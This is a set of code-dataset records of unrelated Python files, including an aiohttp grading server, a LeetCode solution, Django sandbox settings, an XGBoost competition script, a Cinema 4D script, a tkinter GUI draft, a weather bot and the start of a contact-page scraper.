'\\n'.join([f\"{p.comment}: {p.points}/{p.out_of}\"\n for p in points])\n if points:\n comment = f\"{tpoints}\\n\\n{comment}\"\n\n oknok = \"ok\" if result else \"nok\"\n return web.Response(text=f\"{oknok}~~{comment}\\n\",\n headers=headers)\n\n return handle_eval\n\n\ndef get_handle_admin(conf : config.Config):\n async def handle_admin(req : web.Request) -> web.Response:\n # assuming we run behind a proxy which sets this\n auth_user = req.match_info.get(\"user\")\n if auth_user is None:\n return web.Response(status=401, text=\"No user info\\n\")\n\n course_name = req.match_info.get(\"course_id\")\n if course_name is None:\n return web.Response(status=404,\n text=f\"No course given for {auth_user}\\n\")\n course = conf.courses.get(course_name.lower())\n print(f\"ADMIN attempt HTTP auth user {auth_user} for {course_name}\")\n\n if course is None:\n return web.Response(status=404,\n text=f\"Course {course_name} not found\\n\")\n if auth_user not in course.authorized:\n return web.Response(\n status=401,\n text=f\"User {auth_user} not authorized for {course_name}\\n\")\n print(f\"ADMIN authorized for {auth_user}/{course_name} at \"\n f\"{time.asctime()}\")\n\n page = req.match_info.get(\"page\")\n return await admin.get(req, course, auth_user, page)\n\n return handle_admin\n\n\ndef main() -> None:\n conf = config.parse(sys.argv)\n slots = cgroup.SlotManager(conf.limit)\n if not slots.available() and conf.limit.any_set():\n print(\"W: limits requested but cgroups are not available\",\n file=sys.stderr, flush=True)\n start_web(conf, slots)\n\n\ndef start_web(conf : config.Config, slots : cgroup.SlotManager) -> None:\n async def shutdown():\n print(\"letting runner do cleanup\")\n await runner.cleanup()\n\n def sigusr1_handler() -> None:\n print(\"Received SIGUSR1, shutting down...\")\n loop.create_task(shutdown())\n\n async def stop_loop(app) -> None:\n print(\"shutdown\")\n loop.stop()\n\n async def start_runner(runner, conf : config.Config):\n await runner.setup()\n site : Optional[Union[web.TCPSite, web.UnixSite, web.SockSite]] = None\n if conf.port is not None:\n print(f\"Starting HTTP server on localhost:{conf.port}\")\n site = web.TCPSite(runner, 'localhost', conf.port)\n elif conf.socket is not None:\n print(f\"Starting UNIX socket server on {conf.socket}\")\n site = web.UnixSite(runner, conf.socket)\n elif conf.socket_fd is not None:\n print(f\"Starting UNIX socket server on FD {conf.socket_fd}\")\n sock = socket.socket(fileno=conf.socket_fd)\n site = web.SockSite(runner, sock)\n assert site is not None, \"Invalid config, no listening address\"\n return await site.start()\n\n app = web.Application()\n templates_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)),\n \"templates\")\n aiohttp_mako.setup(app, input_encoding='utf-8', output_encoding='utf-8',\n default_filters=['decode.utf8'],\n directories=[templates_dir])\n\n eval_sem = asyncio.BoundedSemaphore(conf.max_workers)\n\n handle_is = get_eval_handler(eval_sem, conf, slots,\n InterfaceMode.IS | InterfaceMode.Priviledged)\n app.router.add_get(\"/is\", handle_is)\n app.router.add_post(\"/is\", handle_is)\n\n handle_hint = get_eval_handler(eval_sem, conf, slots, InterfaceMode.Null)\n app.router.add_get(\"/hint\", handle_hint)\n app.router.add_post(\"/hint\", handle_hint)\n\n handle_internal = get_eval_handler(eval_sem, conf, slots,\n InterfaceMode.Priviledged)\n app.router.add_get(\"/internal\", handle_internal)\n app.router.add_post(\"/internal\", handle_internal)\n\n handle_admin = get_handle_admin(conf)\n app.router.add_get(\"/admin/{user}/{course_id}/\", handle_admin)\n app.router.add_post(\"/admin/{user}/{course_id}/\", handle_admin)\n app.router.add_get(\"/admin/{user}/{course_id}/{page}\", handle_admin)\n app.router.add_post(\"/admin/{user}{course_id}/{page}\", handle_admin)\n\n runner = web.AppRunner(app, handle_signals=True)\n app.on_cleanup.append(stop_loop)\n\n loop = asyncio.get_event_loop()\n loop.add_signal_handler(signal.SIGUSR1, sigusr1_handler)\n try:\n loop.run_until_complete(start_runner(runner, conf))\n except Exception:\n print(\"ERROR starting server\", file=sys.stderr)\n traceback.print_exc()\n sys.exit(1)\n\n print(\"started, loaded following configuration:\")\n conf.dump(sys.stdout)\n try:\n loop.run_forever()\n finally:\n loop.close()\n\n\nif __name__ == \"__main__\":\n main()\n\n# vim: colorcolumn=80 expandtab sw=4 ts=4\n","sub_path":"src/core/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"64155433","text":"\n# n = 10\n# nums = []\n# for i in range(n):\n# num = int(input(\"输入任意整数以\"))\n# nums.append(num)\n# # 获取最大值和最小值\n# imax = 0\n# imin = 0\n# for num in nums:\n# if imax < num:\n# imax = num\n#\n# if imin > num:\n# imin = num\n# # 采用 str.format() 打印结果\n# print(\"输入生成的10个数字为{},最大值为{},最小值为{}\".format(num,imax,imin))\n\n# n = 10\n# imax = 0\n# imin = 0\n# for i in range(n):\n# num = int(input(\"输入任意整数>>>\"))\n# if num > imax:\n# imax = num\n# if num < imin:\n# imin = num\n# print(\"10次输入获取的数字中,最大值为{},最小值为{}\".format(imax,imin))\n\n\n\n# 从键盘依次输入10个数,最后打印最大的数、10个数的和、和平均数。\nmax = 0#赋值\nsum = 0\navg = 0\nfor num in range(10):#限制输入次数\n str = int(input(\"请输入第{}个数:\".format(num+1)))\n sum += float(str)\n avg = sum / 10\n if str > max:\n max=str\nprint(\"最大数是:{}\".format(max))\nprint(\"十个数的和是:{}\".format(sum))\nprint(\"十个数的平均数是:{}\".format(avg))","sub_path":"平均值.py","file_name":"平均值.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"8774878","text":"from typing import List\n\n#\n# @lc app=leetcode id=33 lang=python3\n#\n# [33] Search in Rotated Sorted Array\n#\n\n# @lc code=start\n\n\nclass Solution:\n def search(self, nums: List[int], target: int) -> int:\n low = 0\n high = len(nums) - 1\n while low <= high:\n mid = low + (high - low) // 2\n if nums[mid] == target:\n return mid\n if nums[low] <= nums[mid]:\n if target > nums[mid] or target < nums[low]:\n low = mid + 1\n else:\n high = mid - 1\n else:\n if target < nums[mid] or target > nums[high]:\n high = mid - 1\n else:\n low = mid + 1\n return -1\n\n\n# @lc code=end\nif __name__ == \"__main__\":\n s = Solution()\n nums = [4, 5, 6, 7, 0, 1, 2]\n print(s.search(nums, 0))\n","sub_path":"binarysearch/33.search-in-rotated-sorted-array.py","file_name":"33.search-in-rotated-sorted-array.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"423847782","text":"# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nfrom __future__ import unicode_literals\nimport os\n\nfrom capetown.core.settings.base import *\n\n# Path helper\nlocation = lambda x: os.path.join(os.path.dirname(os.path.realpath(__file__)), x)\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/\n\nDEBUG = True\n\nALLOWED_HOSTS = [\"*\"]\n\n# Haystack settings\nHAYSTACK_CONNECTIONS = {\n \"default\": {\n \"ENGINE\": \"haystack.backends.whoosh_backend.WhooshEngine\",\n \"PATH\": location(\"haystack\"),\n },\n}\n\nINSTALLED_APPS = [\"sandbox\"] + list(INSTALLED_APPS)\n# Application definition\n\n# Wagtail settings\nTEMPLATES = [\n {\n \"BACKEND\": \"django.template.backends.django.DjangoTemplates\",\n \"DIRS\": [location(\"templates\"), location(\"templates/oscar\"),],\n \"APP_DIRS\": True,\n \"OPTIONS\": {\n \"context_processors\": [\n \"django.template.context_processors.debug\",\n \"django.template.context_processors.request\",\n \"django.contrib.auth.context_processors.auth\",\n \"django.contrib.messages.context_processors.messages\",\n \"oscar.apps.search.context_processors.search_form\",\n \"oscar.apps.checkout.context_processors.checkout\",\n \"oscar.apps.customer.notifications.context_processors.notifications\",\n \"oscar.core.context_processors.metadata\",\n ],\n },\n },\n]\n\n\n# Database\n# https://docs.djangoproject.com/en/2.2/ref/settings/#databases\n\nDATABASES = {\n \"default\": {\"ENGINE\": \"django.db.backends.sqlite3\", \"NAME\": location(\"db.sqlite3\"),}\n}\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/2.2/howto/static-files/\n\nSTATICFILES_FINDERS = [\n \"django.contrib.staticfiles.finders.FileSystemFinder\",\n \"django.contrib.staticfiles.finders.AppDirectoriesFinder\",\n]\n\nSTATICFILES_DIRS = [location(\"static/\")]\n\n# ManifestStaticFilesStorage is recommended in production, to prevent outdated\n# Javascript / CSS assets being served from cache (e.g. after a Wagtail upgrade).\n# See https://docs.djangoproject.com/en/2.2/ref/contrib/staticfiles/#manifeststaticfilesstorage\n\nSTATIC_ROOT = location(\"public/static\")\nSTATIC_URL = \"/static/\"\n\nMEDIA_ROOT = location(\"public/media\")\nMEDIA_URL = \"/media/\"\n","sub_path":"sandbox/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"216618654","text":"import pandas as pd \nimport numpy as np \nimport matplotlib.pyplot as plt \nfrom sklearn.preprocessing import LabelEncoder\nimport re \nfrom sklearn.feature_extraction import DictVectorizer\nfrom sklearn.model_selection import train_test_split\nimport pandas as pd\nfrom pandas.tseries.holiday import USFederalHolidayCalendar as calendar\nimport nltk \nimport xgboost as xgb\n\nfrom extract_feat_base import * \n\n### FUNC ########################################################################\ndef xgb_feat_importance(model,cols,file_name):\n print('-----> Feature importance ... ')\n feature_importance_dict = model.get_fscore()\n fs = ['f%i' % i for i in range(len(cols))]\n f1 = pd.DataFrame({'f': list(feature_importance_dict.keys()), 'importance': list(feature_importance_dict.values())})\n f2 = pd.DataFrame({'f': fs, 'feature_name': cols})\n feature_importance = pd.merge(f1, f2, how='right', on='f')\n feature_importance = feature_importance.fillna(0)\n feature_importance.sort_values(by='importance', ascending=False)\n print(feature_importance.sort_values)\n feature_importance.to_csv(file_name, index=False) \n#################################################################################\n\n\n### FEATURE ENG. ################################################################\nmeta = {'target': 'deal_probability', \n 'test_id': 'item_id', \n 'cols': {\n 'item_id': 'REM', \n 'user_id': 'CAT', \n 'region': 'CAT', \n 'city': 'CAT', \n 'parent_category_name': 'CAT',\n 'category_name': 'CAT',\n 'param_1': 'CAT', \n 'param_2': 'CAT', \n 'param_3': 'CAT', \n 'title': 'LEN', \n 'description': 'LEN' , \n 'price': 'NUM', \n 'item_seq_number': 'NUM', \n 'activation_date': 'DATE', \n 'user_type': 'CAT', \n 'image': 'REM',\n 'image_top_1': 'NUM'\n }}\n\ntrain = pd.read_csv('data/train.csv')\ntest = pd.read_csv('data/test.csv')\n\nprint('--------------> Basic Feature Engineering ... ')\nall_data , y_train = encode_dataset(train=train,test=test,meta=meta)\nprint(all_data.head())\n#################################################################################\n\n### MODELING ####################################################################\nprint('--------------> Modeling ... ')\ntrain_obs = len(y_train)\nXtr, Xv, ytr, yv = train_test_split(all_data[:train_obs].values, y_train, test_size=0.1, random_state=1973)\ndtrain = xgb.DMatrix(Xtr, label=ytr)\ndvalid = xgb.DMatrix(Xv, label=yv)\ndtest = xgb.DMatrix(all_data[train_obs:].values)\nwatchlist = [(dtrain, 'train'), (dvalid, 'valid')]\n\n#Try different parameters! My favorite is random search :)\nxgb_pars = {'min_child_weight': 50,\n 'eta': 0.01,\n 'colsample_bytree': 0.5, #0.3\n 'max_depth': 15, # 10\n 'subsample': 0.5, #0.8\n 'lambda': 0.5,\n 'nthread': -1,\n 'booster' : 'gbtree',\n 'silent': 1,\n 'eval_metric': 'rmse',\n 'objective': 'reg:linear'}\n\nmodel = xgb.train(xgb_pars, dtrain, 10000, watchlist, early_stopping_rounds=50,maximize=False, verbose_eval=10)\n\nprint('Modeling RMSE %.5f' % model.best_score)\n\nprint('--------------> Submission ... ')\ntest[meta['target']] = model.predict(dtest)\nsubfn = \"base1_eta001_val_\"+str(model.best_score)+\"__rnd_\"+str(model.best_iteration)+\".csv\"\ntest[[meta['test_id'], meta['target']]].to_csv(subfn, index=False)\n\nprint('--------------> Retrain all data + Feature importance ... ')\ndtrain = xgb.DMatrix(all_data[:train_obs].values, label=y_train)\ndtest = xgb.DMatrix(all_data[train_obs:].values)\nmodel = xgb.train(xgb_pars, dtrain, model.best_iteration+5, maximize=False, verbose_eval=10)\nprint('-----> Submission ... ')\ntest[meta['target']] = model.predict(dtest)\nsubfn = \"base1_eta001_all_data__rnd_\"+str(model.best_iteration)+\".csv\"\ntest[[meta['test_id'], meta['target']]].to_csv(subfn, index=False)\n\nxgb_feat_importance(model=model,cols=all_data.columns,file_name=\"feat_importance_base1_eta001.csv\")\n#################################################################################\n\n\n","sub_path":"competitions/avito-demand-prediction/tentatives/base_xgb.py","file_name":"base_xgb.py","file_ext":"py","file_size_in_byte":4160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"644260691","text":"\"\"\"\nAR_ObjectToSpline\n\nAuthor: Arttu Rautio (aturtur)\nWebsite: http://aturtur.com/\nName-US: AR_ObjectToSpline\nVersion: 1.0\nDescription-US: Converts selected object(s) to splines\n\nWritten for Maxon Cinema 4D R21.207\nPython version 2.7.14\n\"\"\"\n# Libraries\nimport c4d\nfrom c4d import utils as u\n\n# Functions\ndef main():\n doc = c4d.documents.GetActiveDocument() # Get active Cinema 4D document\n doc.StartUndo() # Start recording undos\n storeMode = doc.GetMode() # Get current editor mode\n doc.SetMode(c4d.Medges) # Set editor mode to 'Edges'\n selection = doc.GetActiveObjects(0) # Get active objects\n makeEditable = c4d.MCOMMAND_MAKEEDITABLE # Mcommand 'Make Editable'\n selectAll = c4d.MCOMMAND_SELECTALL # Mcommand 'Select All'\n edgeToSpline = c4d.MCOMMAND_EDGE_TO_SPLINE # Mcommand 'Edge To Spline'\n modeEdgeSel = c4d.MODELINGCOMMANDMODE_EDGESELECTION # Modeling command mode 'Edge Selection'\n createUndo = c4d.MODELINGCOMMANDFLAGS_CREATEUNDO # Modeling command flag 'Create undo'\n bc = c4d.BaseContainer() # Initialize base container\n u.SendModelingCommand(makeEditable, selection, modeEdgeSel, bc, doc, createUndo) # Send modeling command 'Make Editable'\n u.SendModelingCommand(selectAll, selection, modeEdgeSel, bc, doc, createUndo) # Send modeling command 'Select All'\n u.SendModelingCommand(edgeToSpline, selection, modeEdgeSel, bc, doc, createUndo) # Send modeling command 'Edge To Spline'\n for obj in selection: # Iterate through selected objects\n spline = obj.GetDown() # Get spline\n doc.AddUndo(c4d.UNDOTYPE_NEW, spline) # Add undo for inserting spline object\n spline.InsertAfter(obj) # Move spline next to original object\n spline.SetMg(obj.GetMg()) # Reset spline objects matrix\n obj.Remove() # Delete original object\n doc.SetMode(storeMode) # Set editor mode back as it was\n doc.EndUndo() # End recording undos\n c4d.EventAdd() # Refresh Cinema 4D\n \n# Execute main()\nif __name__=='__main__':\n main()","sub_path":"AR_Scripts_1.0.16_R21_Deprecated/AR_ObjectToSpline.py","file_name":"AR_ObjectToSpline.py","file_ext":"py","file_size_in_byte":2001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"242123107","text":"# from kivy.app import App\nfrom utils import globals\n\n\nclass ClientThreadSelector:\n\n def __init__(self, server_thread):\n self.client_thread = None\n self.server_thread = server_thread\n self.client_dict_lists = {}\n self.open_selection()\n\n def open_selection(self):\n self.client_dict_lists = {\"0\": \"asdf\"}\n\n def get_connected_client(self, *args):\n args[0].dismiss()\n current_client_idx = args[1]\n globals.checked_item = \"\"\n print(self.client_dict_lists[current_client_idx])\n # self.client_thread = self.server_thread.client_thread[int(current_client_idx)]\n\n\nif __name__ == '__main__':\n\n print(ClientThreadSelector(server_thread=None).client_thread)\n","sub_path":"utils/client_thread_select.py","file_name":"client_thread_select.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"635498222","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Mar 1 13:19:44 2019\n\n@author: chenchen\n\"\"\"\n\nimport tkinter as tk\nimport tkinter.messagebox\nimport tkinter.ttk\n\n\nroot = tk.Tk()\nroot.title(\"Get Data from LONGi DB\")\nroot[\"height\"] = 800\nroot[\"width\"] = 1600\n\n\nlabel_station = tk.Label(root, text=\"SolarStation:\", justify=tk.RIGHT, width=50)\nlabel_station.place(x=20, y=40, width=100, height=50)\nD_stations_info = {\n \"hami\": {\n \"inverter\": {\n \"table\": [\"inverter_01\", \"inverter_02\", \"inverter_03\", \"inverter_04\", \n \"inverter_05\", \"inverter_06\", \"inverter_07\", \"inverter_08\", \n \"inverter_09\", \"inverter_10\", \"inverter_11\", \"inverter_12\", \n \"inverter_13\", \"inverter_14\"],\n \"field\": [\"温度\", \"输入总功率\", \"直流电流\", \"直流电压\"] \n }, \n \"meteo\": {\n \"table\": [\"meteo_01\"],\n \"field\": [\"温度\", \"水平辐射\"] \n }, \n \"acmeter\": {\n \"table\": [],\n \"field\": [] \n }, \n \"dcmeter\": {\n \"table\": [],\n \"field\": [] \n }, \n \"tracker\": {\n \"table\": [],\n \"field\": [] \n }, \n }, \n \"daqing\": {\n \"inverter\": {\n \"table\": [\"inverter_01\", \"inverter_02\", \"inverter_03\", \"inverter_04\", \n \"inverter_05\", \"inverter_06\", \"inverter_07\", \"inverter_08\", \n \"inverter_09\", \"inverter_10\", \"inverter_11\", \"inverter_12\"],\n \"field\": [\"温度\", \"输入总功率\", \"直流电流\", \"直流电压\"] \n }, \n \"meteo\": {\n \"table\": [\"meteo_01\"],\n \"field\": [\"温度\", \"水平辐射\"] \n }, \n \"acmeter\": {\n \"table\": [],\n \"field\": [] \n }, \n \"dcmeter\": {\n \"table\": [],\n \"field\": [] \n }, \n \"tracker\": {\n \"table\": [],\n \"field\": [] \n }, \n }, \n \"pucheng\": {\n \"inverter\": {\n \"table\": [\"inverter_01\", \"inverter_02\", \"inverter_03\", \"inverter_04\", \n \"inverter_05\", \"inverter_06\", \"inverter_07\", \"inverter_08\", \n \"inverter_09\", \"inverter_10\", \"inverter_11\", \"inverter_12\", \n \"inverter_13\", \"inverter_14\", \"inverter_15\", \"inverter_16\", \n \"inverter_17\", \"inverter_18\", \"inverter_19\", \"inverter_20\", \n \"inverter_21\", \"inverter_22\", \"inverter_23\", \"inverter_24\", \n \"inverter_25\", \"inverter_26\", \"inverter_27\", \"inverter_28\"],\n \"field\": [\"温度\", \"输入总功率\", \"直流电流\", \"直流电压\"] \n }, \n \"meteo\": {\n \"table\": [\"meteo_01\"],\n \"field\": [\"温度\", \"水平辐射\"] \n }, \n \"acmeter\": {\n \"table\": [],\n \"field\": [] \n }, \n \"dcmeter\": {\n \"table\": [],\n \"field\": [] \n }, \n \"tracker\": {\n \"table\": [],\n \"field\": [] \n }, \n }\n }\n\n#combo_station = tkinter.ttk.Combobox(root, width=50, values=tuple(D_stations_info.keys()))\n#combo_station.place(x=130, y=40, width=100, height=30)\n#\n#\n#combo_devType = tkinter.ttk.Combobox(root, width=50)\n#combo_devType.place(x=300, y=40, width=100, height=30)\n#\n#combo_table = tkinter.ttk.Combobox(root, width=50)\n#combo_table.place(x=400, y=40, width=100, height=30)\n#\n#combo_field = tkinter.ttk.Combobox(root, width=50)\n#combo_field.place(x=500, y=40, width=100, height=30)\n#\n#\n#\n#def comboChange(event):\n# station = combo_station.get()\n# if station:\n# combo_devType[\"values\"] = tuple(D_stations_info[station].keys())\n# else:\n# combo_devType.set([])\n#combo_station.bind('<>', comboChange)\n#\n#\n#\n#def combo222(event):\n# station = combo_station.get()\n# devType = combo_devType.get()\n# if devType:\n# print(\"ok\")\n# combo_table[\"values\"] = tuple(D_stations_info[station][devType][\"table\"])\n# combo_field[\"values\"] = tuple(D_stations_info[station][devType][\"field\"])\n# else:\n# combo_table.set([])\n# combo_field.set([]) \n#combo_devType.bind('<>', combo222)\n\n\n\nL_table = [\"inverter_01\", \"inverter_02\", \"inverter_03\", \"inverter_04\", \n \"inverter_05\", \"inverter_06\", \"inverter_07\", \"inverter_08\", \n \"inverter_09\", \"inverter_10\", \"inverter_11\", \"inverter_12\", \n \"inverter_13\", \"inverter_14\", \"inverter_15\", \"inverter_16\", \n \"inverter_17\", \"inverter_18\", \"inverter_19\", \"inverter_20\", \n \"inverter_21\", \"inverter_22\", \"inverter_23\", \"inverter_24\", \n \"inverter_25\", \"inverter_26\", \"inverter_27\", \"inverter_28\"]\n\n#frame_root = tkinter.Frame(root)\nframe_01 = tkinter.Frame(root, container=True)\nframe_01.pack(side=\"bottom\")\n\ncheck_var_01 = tk.IntVar()\ncheck_01 = tk.Checkbutton(frame_01, text = \"inverter_01\", variable=check_var_01, \n onvalue=1, offvalue=0, height=5, width=20)\ncheck_01.pack()\n\n\n\n\n\n\n\n\n\n\n\n'''\ndef comboChange(event):\n station = combo_station.get()\n if station:\n combo_devType[\"values\"] = tuple(D_stations_info[station].keys())\n devType = combo_devType.get()\n if devType:\n print(\"ok\")\n combo_table[\"values\"] = tuple(D_stations_info[station][devType][\"table\"])\n combo_field[\"values\"] = tuple(D_stations_info[station][devType][\"field\"])\n else:\n combo_table.set([])\n combo_field.set([])\n else:\n combo_devType.set([])\ncombo_station.bind('<>', comboChange)\n\n'''\n\n\n\n\n\n\n'''\nvar_station = tk.StringVar()\nvar_station.set('')\n\nvar_ssh_name = tk.IntVar()\nvar_ssh_name.set('')\nvar_ssh_pwd = tk.IntVar()\nvar_ssh_pwd.set('')\n\nvar_mysql_name = tk.IntVar()\nvar_mysql_name.set('')\nvar_mysql_pwd = tk.IntVar()\nvar_mysql_pwd.set('')\n\n\nvar_start_year = tk.IntVar()\nvar_start_year.set(0)\nvar_start_month = tk.IntVar()\nvar_start_month.set(0)\nvar_start_day = tk.IntVar()\nvar_start_day.set(0)\nvar_start_hour = tk.IntVar()\nvar_start_hour.set(0)\nvar_start_minute = tk.IntVar()\nvar_start_minute.set(0)\n\nvar_end_year = tk.IntVar()\nvar_end_year.set(0)\nvar_end_month = tk.IntVar()\nvar_end_month.set(0)\nvar_end_day = tk.IntVar()\nvar_end_day.set(0)\nvar_end_hour = tk.IntVar()\nvar_end_hour.set(0)\nvar_end_minute = tk.IntVar()\nvar_end_minute.set(0)\n\n\n\n\nlabel_station = tk.Label(root, text=\"Station:\", justify=tk.RIGHT, width=80)\nlabel_station.place(x=10, y=5, width=80, height=20)\nentry_station = tk.Entry(root, width=80, textvariable=var_station)\nentry_station.place(x=100, y=5, width=80,height=20)\n\nlabel_ssh_name = tk.Label(root, text=\"ECS Name:\", justify=tk.RIGHT, width=80)\nlabel_ssh_name.place(x=10, y=30, width=80, height=20)\nentry_ssh_name = tk.Entry(root, width=80, textvariable=var_ssh_name)\nentry_ssh_name.place(x=100, y=30, width=80,height=20)\n\nlabel_ssh_pwd = tk.Label(root, text=\"ECS pwd:\", justify=tk.RIGHT, width=80)\nlabel_ssh_pwd.place(x=10, y=55, width=80, height=20)\nentry_ssh_pwd = tk.Entry(root, width=80, textvariable=var_ssh_pwd)\nentry_ssh_pwd.place(x=100, y=55, width=80,height=20)\n\n\nlabel_mysql_name = tk.Label(root, text=\"SQL Nmae:\", justify=tk.RIGHT, width=80)\nlabel_mysql_name.place(x=10, y=80, width=80, height=20)\nentry_mysql_name = tk.Entry(root, width=80, textvariable=var_mysql_name)\nentry_mysql_name.place(x=100, y=80, width=80,height=20)\n\nlabel_mysql_pwd = tk.Label(root, text=\"SQL pwd:\", justify=tk.RIGHT, width=80)\nlabel_mysql_pwd.place(x=10, y=105, width=80, height=20)\nentry_mysql_pwd = tk.Entry(root, width=80, textvariable=var_mysql_pwd)\nentry_mysql_pwd.place(x=100, y=105, width=80,height=20)\n'''\n\n\n'''\ndef execute():\n station = entry_station.get()\n ssh_name = entry_ssh_name.get()\n ssh_passwd = entry_ssh_pwd.get()\n mysql_name = entry_mysql_name.get()\n mysql_passwd = entry_mysql_pwd.get()\n \n''' \n\n \n\n\n\nroot.mainloop()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"test/test_tk.py","file_name":"test_tk.py","file_ext":"py","file_size_in_byte":9345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"173088674","text":"import os\nimport random\nimport string\nimport tempfile\n\nimport matplotlib.pyplot as plt\nimport requests\n\nimport keys\nfrom utils import config\n\n\nclass Meteum:\n def __init__(self):\n self.url = config.WEATHER_PAGE\n self.weather_header = {\n 'X-Yandex-API-Key': keys.WEATHER_KEY\n }\n\n self.forecast_template = config.FORECAST_TEMPLATE\n\n def _make_request(self, params):\n req = requests.get(\n url=self.url,\n params={\"geoid\": params[\"geoid\"]}, headers=self.weather_header)\n req = req.json()\n return req\n\n def predict(self, params):\n \"\"\"\n :param params: params for request, geoid and predict_day\n :return:\n \"\"\"\n req = self._make_request(params)\n\n if params[\"predict_day\"] < 0:\n response = self._draw_plot(req, params)\n response[\"search_condition\"] = config.SEARCH_CONDITIONS[\n req[\"forecasts\"][0][\"parts\"][\"day\"][\"condition\"]\n ]\n response.update(req[\"forecasts\"][0])\n return response\n else:\n day_forecast = req[\"forecasts\"][params[\"predict_day\"]]\n # print(day_forecast)\n print(config.TRANSLATE_CONDITIONS[day_forecast[\"parts\"][\"day\"][\n \"condition\"]])\n text_response = self.forecast_template.format(\n params[\"ru_city\"].title(),\n day_forecast[\"date\"],\n day_forecast[\"parts\"][\"day\"][\"temp_avg\"],\n day_forecast[\"parts\"][\"night\"][\"temp_avg\"],\n day_forecast[\"parts\"][\"day\"][\"wind_speed\"],\n day_forecast[\"parts\"][\"day\"][\"pressure_mm\"],\n config.CLOUDNESS[day_forecast[\"parts\"][\"day\"][\"cloudness\"]][\n \"emoji\"] + \" \" + config.CLOUDNESS[day_forecast[\"parts\"][\n \"day\"][\"cloudness\"]][\"ru\"],\n config.EMOJI_CONDITIONS[day_forecast[\"parts\"][\"day\"][\n \"condition\"]] + \" \" + config.TRANSLATE_CONDITIONS[\n day_forecast[\"parts\"][\"day\"][\"condition\"]]\n )\n response = {\"plot\": False, \"text\": text_response,\n \"search_condition\": config.SEARCH_CONDITIONS[\n day_forecast[\"parts\"][\"day\"][\"condition\"]\n ]}\n response.update(day_forecast)\n return response\n\n def _draw_plot(self, req, params):\n dates, temp_day, temp_night = [], [], []\n for day_forecast in req[\"forecasts\"]:\n dates.append(day_forecast[\"date\"])\n temp_day.append(day_forecast[\"parts\"][\"day\"][\"temp_avg\"])\n temp_night.append(day_forecast[\"parts\"][\"night\"][\"temp_avg\"])\n\n fig = plt.figure(figsize=(15, 10))\n ax = plt.subplot(111)\n ax = plt.plot(dates, temp_day, \"-o\", label=\"Днем\")\n ax = plt.plot(dates, temp_night, \"-o\", label=\"Ночью\")\n plt.grid(ls=\":\")\n plt.title(\n \"Среднее значение температуры днем и ночью в городе {} за {} дней\".format(\n params[\"ru_city\"].title(), len(dates)), fontsize=18)\n plt.xlabel(\"День\", fontsize=15)\n plt.ylabel(\"Температура, °C\", fontsize=15)\n plt.legend(loc=\"best\", fontsize=15)\n plt.yticks(fontsize=15)\n random_name = \"\".join(\n random.choices(string.ascii_letters, k=10)) + \".png\"\n\n print(random_name)\n path_to_save = os.path.join(tempfile.gettempdir(), random_name)\n print(path_to_save)\n fig.savefig(path_to_save, pad_inches=0)\n return {\n \"plot\": True,\n \"path_to_plot\": path_to_save\n }\n\n\nif __name__ == '__main__':\n meteum = Meteum()\n pred = meteum.predict({\n \"ru_city\": \"Санкт-Петербург\",\n 'geoid': 2,\n 'predict_day': 0\n })\n","sub_path":"1st-term/Python/telegram-bot/yandex_weather/meteum.py","file_name":"meteum.py","file_ext":"py","file_size_in_byte":3912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"173932167","text":"# -*- coding:utf-8 -*-\nfrom bs4 import BeautifulSoup\nimport requests\nimport pandas\nfrom pandas import DataFrame, merge, read_csv\n'''\nurlTable = read_csv('pardot.csv')\nattechList = DataFrame(data={'attechList': [\"/contact\", \"/contact.html\", \"/contact/index.html\", \"/inquiry\", \"/inquiry.html\", \"/inquiry/index.html\",\n \"/contact-us\", \"/contact-us.html\", \"/contact-us/index.html\", \"/contactus\", \"/contactus.html\", \"/contactus/index.html\", \"/information\",\n \"/information.html\", \"/information/index.html\", \"/info\", \"/info.html\", \"/info/index.html\", \"/contact_us\", \"/contact_us.html\", \"/contact_us/index.html\"]})\n\n################################## Request And Find 'input'Tag ########################################################################################################################################\n\ntarget = list()\ni = 0\ninputTagCount = 0\nfor url in urlTable['Domain']:\n try:\n for attectUrl in attechList['attechList']:\n inputTagUrl = list()\n targetUrl = url+attectUrl\n targetUrl2 = targetUrl.replace('http://', '')\n request = requests.get(targetUrl, timeout=60)\n targetRequest = request.url\n targetRequestStatus_code = request.status_code\n targetHtml = request.text\n if targetRequestStatus_code == 200 and targetUrl2 in targetRequest:\n soup = BeautifulSoup(targetHtml, 'html.parser')\n formTagList = soup.find_all('form')\n inputTagCount = 0\n for form in formTagList:\n inputTagList = form.find_all('input')\n if len(inputTagList) > 0:\n inputTagCount += 1\n if inputTagCount > 0:\n inputTagUrl.append(targetRequest)\n print(targetUrl + ' matched_and_Find_inputTag~!')\n open(\"./html/\"+str(i)+\".txt\", \"w\",\n encoding='utf8').write(request.text)\n i += 1\n if len(inputTagUrl) > 0:\n target = target + inputTagUrl\n except Exception:\n pass\n\nif len(target) > 0:\n df = pandas.DataFrame(data={\"url\": target})\n df.to_csv(\"targetUrl.csv\", sep=',', index=False)\n\n'''\n##############################################################################################################################################################################################################\n\n############################ Find 'input'TagName In HTML File 